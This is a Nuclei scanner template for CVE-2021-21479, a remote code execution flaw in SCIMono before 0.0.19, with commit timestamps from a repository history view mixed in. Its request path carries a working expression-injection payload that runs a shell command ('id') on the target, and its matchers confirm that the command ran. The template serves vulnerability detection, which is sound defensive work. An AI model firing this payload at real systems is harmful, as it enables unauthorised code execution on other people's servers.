nuclei-templates/cves/2021/CVE-2021-21479.yaml

32 lines
1000 B
YAML
Raw Normal View History

2021-07-18 04:11:56 +00:00
id: CVE-2021-21479
info:
name: SCIMono < v0.0.19 Remote Code Execution
author: dwisiswant0
severity: critical
reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
description: |
In SCIMono before 0.0.19, it is possible for an attacker to inject and
execute java expression compromising the availability and integrity of the system.
2021-07-20 08:52:31 +00:00
tags: cve,cve2021,scimono,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.10
cve-id: CVE-2021-21479
cwe-id: CWE-74
2021-07-18 04:11:56 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
2021-07-18 17:24:34 +00:00
2021-07-18 04:11:56 +00:00
matchers:
- type: word
words:
- "The attribute value"
- "java.lang.UNIXProcess@"
- "has invalid value!"
2021-07-20 08:48:21 +00:00
- '"status" : "400"'
2021-07-18 04:11:56 +00:00
part: body
condition: and